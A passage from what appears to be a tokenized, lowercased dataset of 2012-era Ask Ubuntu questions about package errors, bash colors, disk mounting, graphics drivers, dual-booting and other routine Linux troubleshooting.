libtemplateparser4 libthreadweaver4 libtimedate-perl liburi-perl libvirtodbc0 libweather-ion6 libwww-perl libwww-robotrules-perl libxml2-utils libxss1 libzip2 muon muon-installer muon-notifier muon-updater mysql-client-core-5.5 mysql-common mysql-server-core-5.5 ntrack-module-libnl-0 odbcinst odbcinst1debian2 okular okular-extra-backends oxygen-cursor-theme oxygen-icon-theme partitionmanager phonon phonon-backend-gstreamer pinentry-gtk2 pinentry-qt4 plasma-dataengines-addons plasma-dataengines-workspace plasma-desktop plasma-netbook plasma-scriptengine-javascript plasma-scriptengine-python plasma-widget-facebook plasma-widget-folderview plasma-widget-kimpanel plasma-widget-menubar plasma-widget-message-indicator plasma-widget-networkmanagement plasma-widgets-addons plasma-widgets-workspace plymouth-theme-kubuntu-logo plymouth-theme-kubuntu-text polkit-kde-1 printer-applet python-kde4 python-pyudev python-qt4 python-qt4-dbus python-sip qapt-batch qapt-deb-installer quassel quassel-data rekonq sgml-data shared-desktop-ontologies software-properties-kde soprano-daemon system-config-printer-kde systemsettings tasks-icons update-manager-kde usb-creator-kde userconfig virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common xsettings-kde & & sudo apt-get install ubuntu-desktop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : default-jre : depends : openjdk-6-jre ( > = 6b23~pre11-1ubuntu1~ ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
164909	colored text does n't show in terminal	colored text in terminal does n't show even after un-commenting force_color_prompt=yes in .bashrc . i have to reload .bashrc by issuing . ~/.bashrc command before it takes effect . .bashrc # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm '' set | grep ls_colors ls_colors='rs=0 : di=01 ; 34 : ln=01 ; 36 : mh=00 : pi=40 ; 33 : so=01 ; 35 : do=01 ; 35 : bd=40 ; 33 ; 01 : cd=40 ; 33 ; 01 : or=40 ; 31 ; 01 : su=37 ; 41 : sg=30 ; 43 : ca=30 ; 41 : tw=30 ; 42 : ow=34 ; 42 : st=37 ; 44 : ex=01 ; 32 : *.tar=01 ; 31 : *.tgz=01 ; 31 : *.arj=01 ; 31 : *.taz=01 ; 31 : *.lzh=01 ; 31 : *.lzma=01 ; 31 : *.tlz=01 ; 31 : *.txz=01 ; 31 : *.zip=01 ; 31 : *.z=01 ; 31 : *.z=01 ; 31 : *.dz=01 ; 31 : *.gz=01 ; 31 : *.lz=01 ; 31 : *.xz=01 ; 31 : *.bz2=01 ; 31 : *.bz=01 ; 31 : *.tbz=01 ; 31 : *.tbz2=01 ; 31 : *.tz=01 ; 31 : *.deb=01 ; 31 : *.rpm=01 ; 31 : *.jar=01 ; 31 : *.war=01 ; 31 : *.ear=01 ; 31 : *.sar=01 ; 31 : *.rar=01 ; 31 : *.ace=01 ; 31 : *.zoo=01 ; 31 : *.cpio=01 ; 31 : *.7z=01 ; 31 : *.rz=01 ; 31 : *.jpg=01 ; 35 : *.jpeg=01 ; 35 : *.gif=01 ; 35 : *.bmp=01 ; 35 : *.pbm=01 ; 35 : *.pgm=01 ; 35 : *.ppm=01 ; 35 : *.tga=01 ; 35 : *.xbm=01 ; 35 : *.xpm=01 ; 35 : *.tif=01 ; 35 : *.tiff=01 ; 35 : *.png=01 ; 35 : *.svg=01 ; 35 : *.svgz=01 ; 35 : *.mng=01 ; 35 : *.pcx=01 ; 35 : *.mov=01 ; 35 : *.mpg=01 ; 35 : *.mpeg=01 ; 35 : *.m2v=01 ; 35 : *.mkv=01 ; 35 : *.webm=01 ; 35 : *.ogm=01 ; 35 : *.mp4=01 ; 35 : *.m4v=01 ; 35 : *.mp4v=01 ; 35 : *.vob=01 ; 35 : *.qt=01 ; 35 : *.nuv=01 ; 35 : *.wmv=01 ; 35 : *.asf=01 ; 35 : *.rm=01 ; 35 : *.rmvb=01 ; 35 : *.flc=01 ; 35 : *.avi=01 ; 35 : *.fli=01 ; 35 : *.flv=01 ; 35 : *.gl=01 ; 35 : *.dl=01 ; 35 : *.xcf=01 ; 35 : *.xwd=01 ; 35 : *.yuv=01 ; 35 : *.cgm=01 ; 35 : *.emf=01 ; 35 : *.axv=01 ; 35 : *.anx=01 ; 35 : *.ogv=01 ; 35 : *.ogx=01 ; 35 : *.aac=00 ; 36 : *.au=00 ; 36 : *.flac=00 ; 36 : *.mid=00 ; 36 : *.midi=00 ; 36 : *.mka=00 ; 36 : *.mp3=00 ; 36 : *.mpc=00 ; 36 : *.ogg=00 ; 36 : *.ra=00 ; 36 : *.wav=00 ; 36 : *.axa=00 ; 36 : *.oga=00 ; 36 : *.spx=00 ; 36 : *.xspf=00 ; 36 : '
164912	after 12.04 upgrade - /var/www is missing	i just upgraded from ~10.10 ( it was stuck , un-upgradeable ) to 12.04 by installing over the top of the existing installation . the home folder and desktop files all seem to still be present , as expected , but the /var/www directory is gone ! a file system search does n't turn anything up , looking for `` www '' . apache does n't seem to be installed anymore either . does the installer really delete the entire folder ? output of fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00032a24 device boot start end blocks id system /dev/sda1 * 63 964622924 482311431 83 linux /dev/sda2 964622925 976768064 6072570 5 extended /dev/sda5 964622988 976768064 6072538+ 82 linux swap / solaris disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x34e85825 device boot start end blocks id system /dev/sdb1 63 1953520064 976760001 fd linux raid autodetect disk /dev/sdg : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0b366f5b device boot start end blocks id system /dev/sdg1 63 1953520064 976760001 fd linux raid autodetect output of df -h : ( temporarily mounted in the 12.04 live cd ) filesystem size used avail use % mounted on /dev/sda1 457g 77g 358g 18 % /media/500gb using some of the file system tools ( debugfs , extundelete , ext2grep ) i can see the deleted www directory . however , it looks like that deletion combined with the operating system upgrade ruined any chances of recovering the directory .
164913	12.04 lts installs or runs from install cd using my 2nd monitor but wo n't run or show when installed	when using the install cd in `` try this mode '' or during install my 2nd monitor shows up and works fine ... it shows hp 20 '' monitor connected to the correct video controller . i installed with the laptop screen shut even ... doing everything via the 2nd monitor . once the install was completed 12.04 will no longer recognize the 2nd moitor and will not show that one is connected at all . i 've installed 2 or 3 times now and the same results . how can i get my install to recognize that i have a 2nd monitor attached and that i want to use it . hp compaq 8510w workstation nvidia driver . hp2035 20 '' monitor connected via a docking station ( but it does n't matter if it 's connected to the docking station or the direct vga port as i 've tried both ) .
164914	cdrom is not recognized	i 'm running precise pangolin on my laptop and always keep it updated . i 've had some problems with the cdrom not being recognized by k3b before , but got it fixed by changing the permissions . but this time it seems that it is totally vanished from my computer . i 've tried many different things that users had suggested on this website and many other websites , but none seems to work . ironically , it works just fine when i boot to windows . here is the output of some commands : $ sudo wodim -- devices wodim : overview of accessible drives ( 0 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - and $ sudo depmod -ae does n't seem to do any good for me . also , for some reason there was no /dev/cdrom or /dev/cdroms or /dev/dvdrom folder on my computer . nothing even similar to that . my fstab looked like this : proc /proc proc nodev , noexec , nosuid 0 0 uuid=50424cf6-6dd8-4d34-a441-dd964f67ea97 / ext4 errors=remount-ro 0 1 uuid=ebf67e0f-3597-4ed9-bedc-73a4e8049071 /boot ext4 defaults 0 2 uuid=e22d709a-c084-4fbf-bad3-2fef352e7e75 /home ext4 defaults , user_xattr 0 2 uuid=94ca0e7c-e4bc-43b6-993f-fd140b6db7bd none swap sw 0 0 and i added different things like the following : /dev/cdrom /mnt/cdrom iso9660 noauto , ro 0 0 but none of them helped . and finally $ dmesg | grep cdrom returns nothing . i 'm not very familiar with technical things , i just tried all the different things suggested by others . any help would be appreciated . -- there are nothing related to cdrom in lshw , but in the output there are some unclaimed things : $ sudo lshw *-core [ ... ] *-pci [ ... ] *-serial unclaimed description : smbus product : 82801h ( ich8 family ) smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 03 width : 32 bits clock : 33mhz configuration : latency=0 resources : memory : a0100000-a01000ff ioport:1c20 ( size=32 ) *-remoteaccess unclaimed vendor : intel physical id : 1 capabilities : inbound i 'm not sure if it is something related or not !
164916	ubuntu for business pos and erp	since 16/07/2012 i got a new job with a cooperative producing and selling craft . am an ubuntu enthusiast and i wish to use it in the organization with my colleagues for point of sale/accounting project management any way anything that can help us run the organization smoothly . i am not a professional in it and i have only basics knowledge but am not afraid to learn . the organization is a cooperative base in cameroon africa of over 200 producers of various craft . traditional handicraft catalog
164917	how do i install tor on my ubuntu system ?	i have ubuntu 10.04 lts 64 bit os . how do i install tor so that it works and does n't give me an error message ? i got tor as an archive file ( tar.gz ) and i have an amdx64 architecture . i am new to linux as i am coming from a windows background . please help .
164920	is it acceptable to subscribe someone else to a bug report ?	launchpad lets you subscribe someone else to a bug report . occasionally i find a bug closely related to one that person x is already subscribed to . i therefore think x is likely to be interested in following the new bug , so it makes sense to notify him in this way . on the other hand , spamming x with extra e-mail can be considered poor etiquette . is subscribing someone else acceptable ? ( and if not , then why does launchpad permit it ? ) what about subscribing a team to a relevant bug ?
164921	elan touchpad sluggish in ubuntu 12.04i	i checked the xorg.conf and it says `` synaptics '' as the device and driver name . the touchpad does feel like it 's lagging when moving around but all the other features work ( right/left click , multitouch etc ) . i want to fix the sluggishness , and make it smooth and responsive . i 've tried the touchpad settings to no avail . is there a fix for this ( if any ) ?
164925	how can i enable flash for a pygtk webkit ?	i am trying to enable flash in my quickly app . i have a webkit/webview in a scrolledwindow . i know on android you need to enable javascript an plugins . i have look in the webkit2gtk+ reference manual so my code look like this : # gets the webview and scrolledwindow wiget object . self.scrolledwindow = builder.get_object ( `` scrolledwindow '' ) self.webview = webkit.webview ( ) # webview- > settings . self.settings = self.webview.get_settings ( ) self.settings.set_property ( `` enable-plugins '' , true ) self.settings.set_property ( `` enable-javascript '' , true ) but it does not work : ( or in fact , i can hear the sound from the video , just not see images . the terminal response look like this : finish_initializing self.settings.set_property ( `` enable-javascript '' , true ) typeerror : object of type `webkitwebsettings ' does not have property `enable-javascript ' it can run with out the self.settings.set_property ( `` enable-javascript '' , true ) line , but so again no image on the video . nb : i 'm on my first week with python , so i am a noob to python ; )
164926	how to make hdd 's mount at startup in ubuntu 12.04	how do you make hdds and partitions mount at startup with the ubuntu system ? i always keep my media and data files on separate partitions - one 2tb hdd and a 400 odd gig partition . i have been trying to swap the default folder location for the home directory to my other drives . it works when i change the /home/user_name/.config/user-dirs.dirs file to the directories i want , but only until i reboot the system . i am only assuming that the drives not mounting is the problem with it , but it would be helpful either way . if any one knows another reason for why the directories change back to default each time that would be good also .
164931	apache virtual host configuration error	i 'm trying to configure apache2 with django and mod_wsgi on a virtual host . i wrote a simple configuration file : < virtualhost : *.80 > servername gpx serveralias gpx.gpsfte documentroot /var/www/gpx/htdocs wsgiscriptalias / /var/django/gpx/wsgi/mainapp.wsgi < /virtualhost > but when i reload apache i get this error : # service apache2 reload apache2 : syntax error on line 237 of /etc/apache2/apache2.conf : syntax error on line 9 of /etc/apache2/sites-enabled/gpx : expected < /virtualhost : > but saw < /virtualhost > action 'configtest ' failed . the apache error log may have more information . ... fail ! i 'm really lost , what does it mean with < /virtualhost : > ? thanks for any help you can give me .
164932	how to publish a quickly-generated program to windows ?	please advise the best way to publish a quickly-generated program to windows .
164934	i just downloaded webkitgtk using svn and i am not sure what to do next	here https : //live.gnome.org/webkitgtk/ it says to run the following commands to configure and build webkit ( choosing an appropriate prefix ) : ./autogen.sh -- prefix=/usr make but i am not sure what they mean by 'appropriate prefix ' . can anyone offer a clue ?
164935	unavailable repository	i am new to ubuntu and keep butting up against errors , such as this : package libpng12-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libpng12-0 e : unable to locate package subversion e : package 'git-core ' has no installation candidate e : package 'build-essential ' has no installation candidate e : package 'autoconf ' has no installation candidate e : package 'libtool ' has no installation candidate e : unable to locate package libxml2-dev e : unable to locate package libgeos-dev e : unable to locate package libpq-dev e : unable to locate package libbz2-dev e : package 'proj ' has no installation candidate e : unable to locate package munin-node e : unable to locate package munin e : unable to locate package libprotobuf-c0-dev e : unable to locate package protobuf-c-compiler e : unable to locate package libfreetype6-dev e : package 'libpng12-dev ' has no installation candidate e : unable to locate package libtiff4-dev e : unable to locate package libicu-dev e : unable to locate package libboost-all-dev e : unable to locate package libgdal-dev e : unable to locate package libcairo-dev e : unable to locate package libcairomm-1.0-dev e : could n't find any package by regex 'libcairomm-1.0-dev' e : unable to locate package apache2 e : unable to locate package apache2-dev e : unable to locate package libagg-dev when i want to do this : sudo apt-get install subversion git-core tar unzip wget bzip2 build-essential autoconf libtool libxml2-dev libgeos-dev libpq-dev libbz2-dev proj munin-node munin libprotobuf-c0-dev protobuf-c-compiler libfreetype6-dev libpng12-dev libtiff4-dev libicu-dev libboost-all-dev libgdal-dev libcairo-dev libcairomm-1.0-dev apache2 apache2-dev libagg-dev . any help or advice would be greatly appreciated . or referrals to other questions ...
164939	`` analog out of range 92.6khz / 58hz '' message - unable to boot to desktop	i am not a pro on using ubuntu . however , i recently installed ubuntu 12.04 . my pc already had windows 7 ultimate and through wubi i installed ubuntu 12.04 . when i start my pc , i get windows boot manager and it gives me options : windows 7 and ubuntu . so , when i used to select ubuntu , it was booting to desktop . whenever i selected ubuntu , i used to get analog out of range 92.6khz / 58hz.and it stayed for 3-4 seconds and then it used to boot to desktop . however , there was some display driver issue because of which i could feel slowness . i could access both ubuntu unity and ubuntu 2d . however , there did not seem any difference between the two . the same kind of slowness i could feel in both . so , there was some startup option and i disabled nvidia because i thought this was causing the problem . however , after that when i restarted ubuntu again , i only get the analog out of range 92.6khz/58hz screen and it stays there forever and does not boot to ubuntu . guys , plz help !
164941	why removing gnome-core does not remove all of it 's dependencies ?	i installed gnome-core package on ubuntu ( minimal version for the beagle bone ) and it was almost 600mb . however , when i try to un-install it using sudo apt-get autoremove gnome-core it removes only 49 mb . any ideas , how to remove the entire 600 mb ?
164944	how to install applications in sandbox ?	i am facing a problem using 10.04 , i had installed badgerports on my system to run mono application and that was working fine but when i installed wine on my system my mono applications does not work . i think wine had updated dependencies for badgerports , please someone suggest me on how to install applications isolated ( in sandbox ) to resolve dependencies conflict ? please help me .
164946	flash drive boot not detecting hard drive	in my laptop , i have a hard drive with ubuntu 12.04 installed . when i go to boot to it , i get a blank screen with a flashing line , as though it 's waiting for an input . i ca n't input anything . then , when i plug in my flash drive with a ubuntu 12.04 install on it , it boots perfectly . however , it does n't detect that my hard drive even exists . it is , however , listed in bios .
164947	thunderbird not completely translated	i was running 13.0.1 with related language pack ( italian ) installed and my thunderbird was completely translated into my language . suddenly folders names turn back in english ( inbox - unified folders , drafts , templates , sent , archives , junk , trash , outbox ) while almost everything else remained correctly translated . i 'm sure it 's not related to an update , because it started to happen during my 13.0.1 use , and not since its installation . the issue persists with thundebird 14.0 .
164950	can i repair windows startup files through the ubuntu live cd/usb ?	long story short , windows 7 wo n't boot , and the `` startup repair '' routine just hangs . not sure what is corrupted , if it 's the mbr or what . anyway , i was able to boot the live ubuntu usb and move most of my personal data off the c : drive onto an external drive . if necessary i can reinstall windows , but i 'd rather try to repair it first if possible . is there any way to diagnose/repair windows boot problems through ubuntu ?
164954	uninstall rvm , ruby , ruby gem and rails in ubuntu 12.04	what is the best way to remove rvm , ruby , ruby gem and rails in ubuntu 12.04 ?
164960	when and how is it safe to perform a system update ?	i 've installed ubuntu 12.04 lts . should i update it or leave it like that ? i ask , because the last time i had installed ubuntu and updated it , i started facing errors like system program problem detected and internal errors . so , it is recommended to update it ? if yes , what is the safest method to do so ? is it by using ubuntu 's update manager or using the terminal . if by terminal , please tell me the commands to accomplish this .
164966	how can i get alt-tab to work in virtualbox vm when in full screen ?	i have virtualbox installed on ubuntu 12.04 lts ( host ) with ubuntu 10.04 lts as a vm ( guest ) . the vm has guest additions installed . i 'd like to be able to reliably use alt-tab to switch windows within the guest , at least when i am in full-screen mode . instead what i currently get is that sometimes it switches windows in the guest , sometimes it switches windows in the host system , sometimes it activates the hud in the host and sometimes it does more than one of these three things at the same time . what can i do so that when i am working on the guest only the guest responds to alt-tab ? ( i have a similar problem with the super key -- though that is n't as much of an issue since 10.04 does n't make as much use of it . )
164968	ubuntu 12.04 on dell latitude d610 along with windows 7	i have a dell latitude d610 laptop with faulty screen so i use it as a desktop with its original dock . i have installed windows 7 which is running fine . hardware specs are as follows intel pentium mobile 1.7ghz 160gb hdd 2 gb ram d link dwa125 usb wireless adapter last night i downloaded latest version of ubuntu from it 's official site and burnt it on a dvd . i chose 50 % hdd ( i.e 80gb ) for ubuntu and remaining half for windows 7 . installation went fine . to my surprise ubuntu recognized all hardware ( wifi , audio , wireless keyboard , mouse etc . ) and after the installation , it asked me to reboot ( ejected the dvd by itself ) . the problem started after i rebooted , it switched to command line with lot of command run in a scrolling screen . it hanged on one line saying something like 'turning off all processes ' . i thought it 's doing something in the background . i left it running whole night and it was still stuck on the same screen in the morning . i forced restart it by power button . grub shows several options ubuntu in normal mode ubuntu in recovery mode something long something log windows first options takes me to complete blank screen and nothing happens . even the monitor goes to power save mode . second option takes me to command line with lot of things scrolling on the screen and stops at a point saying something like 'file system read only ' . not quite sure to fix it . i really want to try ubuntu this time . can anyone help ? hashmi
164973	12.04 lts 64bit login screen and error windows show 12.10	i installed 12.04 lts 64bit using the wubi application alongside windows 7 . everything seemed to have gone smoothly , however the login screen shows 12.10 in the bottom left corner . also , after the first login before i managed to check for updates etc . some crashes occurred and the reports were showing version 12.10 . i am new to this and i am not sure how i have managed to end up with 12.10 packages . the about window shows 12.04 lts . any cure for the above ? many thanks , kris
164976	running ubuntu on my ocz revodrive 2 - no such drivers exist ?	would anyone know if there are future plans or a possiblity of getting some drivers for my ssd ; there is very little to no support from ocz regarding linux drivers - is there a coder out there that could write up a patch or something ? is that possible ? cheers guys , coryn
164978	how to link 3 different u1accounts and sync them on all computers	we are 3 sisters living in 3 different locations ( 2 windows and 1 mac ) . each of us has her own u1 account with photos to share . now we would like to have the content of each account locally synced on each sister 's computer . this would mean that me , sister a , i have my own u1account synced on my pc . how to do to get the content of my 2 sisters accounts also locally on my computer , and automatically synced when they do some changes ( add new photos for example ) ? thanks in advance . charlotte
164980	no hdd shows up during install 12.04 on lenovo u410	i tried installing ubuntu 12.04 on my lenovo u410 laptop . when i launch installation no partitions shows up . the u410 has 2 hdds . 32 gb ssd on /dev/sda and a 500 hdd on /dev/sdb ideally i would like to install ubuntu on the 32gb ssd and keep windows on the 500 gb one and not use the intel smart response technolog . i 'm ok with flashing my drive and starting from scratch with this . or do you 'll have any better suggestions on how to go about partitioning my drive and how to do it ?
164981	installing problems with dell vostro 3460	i 'm having problems installing 12.04 or 11.04 in a new dell vostro 3460 . the issue becomes on the `` raid '' performance that comes with the laptop , a 500gb hdd and a mini sata 32gb ssd . with windows there are no problems using this performance , the boot are in the ssd and the system loads very fast , but when i try to install ubuntu , it does n't show any hard drive in the disk selection screen . does someone have or have solved this issue ?
164984	backup with duplicity on google cloud storage	i have already set a backup routine that backups all my files to amazon s3 using duplicity . i would like to create a similar backup routine with google cloud storage . is it possible to get duplicity to work with gcs ?
164985	installing after windows 7	i currently have windows 7 installed on my laptop which is very capable of supporting ubuntu and windows 7 with respect to hardware . im actually having startup issues in windows 7 atm , that being the main reason for my looking into ubuntu . since i can not boot windows 7 at this time , i want to `` try '' ubuntu on my system with windows 7 present , and am wondering if while i do this , i 'll be able to see my windows files while running the ubuntu os . i ultimately want to back up my files onto an external hard drive in ubuntu , and then go ahead with a full install of ubuntu on my system . is this possible ?
164990	my update manager always stuck while applying changes	my update manager always stuck while applying changes . it stucks until i manually press q to complete applying changes the picture illustrate more .
164992	how to choose os when the arrow keys wo n't work in grub	is there a way i can choose an os my arrow keys do n't work on the os choices menu so it always boots to ubuntu and i want to use another os .
164995	easy_install with different python	i 'm trying to easily install packages to my newly installed python3 on the latest ubuntu release . at present it uses python2.7 be default , so all of my easy_installs will put the packages into /usr/local/lib/python2.7/site-packages/ . obviously if i want to install the various packages in the new version via easy_install , it wo n't do this . assuming easy_install is python specific , how do i specify which easy_install to use ( or , how do i tell easy_install to switch python ) ? can you think of an easier way to do this ? i 've discovered virtualenv but do n't think it 's what i 'm after . edit1 : i 've actually just noticed that after installing distribute with the 'python3 ' command , it has a /usr/local/lib/python3.2/dist-packages/easy-install.pth however i ca n't execute it . doing a *which easy_install* gives /usr/local/bin/easy_install .
164999	firefox updates do n't ( ubuntu 10.04 )	i religiously update my system . since firefox 10 , the updates show up in the ppa , i install them , but nothing changes . ( and firefox keeps nagging me : `` update available '' ) i just tried again for ff 14 . now , synaptics says i have 14.0.1 installed , but firefox version ( help - > about ) still reads 10.0.2 any thoughts ( short of uninstalling and re-installing ? )
165000	why does n't my gedit ( ubuntu 12 ) have an edit button	hello i 'm pretty newbie with linux os , and i have decidet i want to word on gedit with some addons and etc for develop ruby on rails sites . the problem is my gedit has no edit button and i swere i ca n't find it anywere . why is that ?
165001	i have a serious overheating problem.. more details inside	calling all linux gurus , google ninjas , and dell linux users.. so , i 'm a huge fan of open-source software . changing to windows is n't a solution for me . but , i currently use a dell 15r ( n5010 ) . previously on ubuntu 's website , it was listed as one of the most linux friendly laptop 's ( around a year ago , when i first purchased it ) .. when i ran window 's 7 ( 64 bit ) on this computer , i had no overheating problems . when i ran linux 9 ( linux mint 9 , 64 bit , specifically ) - i had no overheating problems . but since 11.0 and up , i 've had heating problems . from what i 've read , it seems to me that this may be a kernel issue.. ? now i have linux 12.04 , ubuntu , respectively . when i boot from a cd , there 's no heating problems..but after i install the system.. i idle at around 60 - 90 celsius..sometimes higher . and sometimes , it gets so hot and my computer simply shuts down . that 's just when i have firefox open , doing nothing but minor web browsing . one tab open with something like twitter , or google on that tab.. i 've used lm-sensors , powertop , jupiter and tweaked the power settings out as much as possible , but the lowest temperature i can reach is about 55 celsius . my computer feels very hot , as if the fan is n't running very strong at all . i ca n't feel air pushing out of it as i do when i have windows loaded onto it . can anyone help me solve this problem ? i need my laptop to stay cool because i do quite a bit of media/music production . when i did media production on linux mint 9 , it never got this hot . i 've cleaned my laptop 's guts . no dust , loose parts , etc . also , there are no settings in the bios to set fan control , as some other laptops have . if you need/want more info that could be helpful , please let me know and i 'll post it . edit : the good news is that i 'm under a warranty . if there 's no way to fix this.. can someone suggest a super linux friendly laptop ? preferably i5 or i7 . i 've also posted this on reddit , too .
165005	is it ok to install java 7 in ubuntu 12.04 ?	i 've read a lot that java 6 works better and that it 's not recommended to use java 7 , is this true ? and why is java 7 not a good option ?
165009	graphics not working with intel i5-3470	i recently upgraded my pc to the following spec : processor : intel core i5-3470 motherboard : ga-b75m-d3h - gigabyte b75m-d3h ivy bridge motherboard ram : jm1333kln-4g - transcend 4gb jetram ddr3 1333 dimm 9-9-9 hdd : st31000524as - seagate 1tb 3.5 '' hdd 7200rpm sata 6gb/s 32mb cache graphics card : using the onboard graphics when installing ubuntu 12.04 , all the boxes shown on screen as well as the menu bar across the top are corrupted . it seems to be a 3d related issue because 2d items such as pictures display in the install window and/or icons are ok during the install . i can upload pictures later but basically all the boxes look as if they have horizontal and vertical tears/pixelation . the edges which are supposed to have a nice shadow effect are also all choppy and jagged . text on the boxes is barely visible and as the text updates different letters become partially visible . it was a bit difficult but i managed to setup my wi-fi ( for updates ) and complete the install . when booting the background image displays as does the mouse cursor but then the screen just flickers a few times before turning off completely . pressing ctrl-alt-f1 gets me to the terminal prompt and i was able to run : $ sudo apt-get update $ sudo apt-get upgrade after installing 305 updates the issue was still not resolved . does anybody have any ideas ? ? i also tried the 12.10 daily build but the kernel crashed during install i 'm new to ubuntu but so far this is really disappointing , i was hoping to use this pc for some development projects i had in mind but it does n't work out the box ! i also don'thave unlimited bandwidth so i ca n't keep downloading updates all the time . windows 7 worked just fine ... .
165019	can i disable launchpad from making the source of my package available ?	i do n't wish that my source code be available for download at launchpad when i upload my packages for building . is it possible ?
165021	how to open directories in geany ide ?	i have a directory already created which has sub-directories in it , it was created by eclipse ide . and now , i 'm willing to continue developing the same project using a different ide - geany ide . but , it seems that geany does n't open directories , it only opens files , is that true ? because it 'd be really hard to develop with it . i 'll have to edit a file , close it and open another file , which is not effective when navigating between different files . what i tried to open a directory : i opened geany , went to project- > open- > /var/www/public_html/ [ projectname ] , then clicked enter/open . but it did n't work as expected , clicking open/enter only shows the project files in the file browser . i 'm assuming that i have to create a special file ( *.geany or something ) and put it in the project root folder to make it a valid geany project , is that true ? if so , then how can i create such a file . extra information : i 'm running ubuntu 12.04 lts , picked up geany from software center , which i think is the latest version .
165023	headphones do n't work on asus k55v	i have an asus k55v . after loading ubuntu 12.04 , i did n't get any sound on my headphones . my speakers work fine ... can you help me with this problem ?
165025	virtualbox not working	when ever i try to start a virtual machine i get this error . i have ubuntu 12.04 ( 64bit ) and kernel linux 3.2.0-27-generic
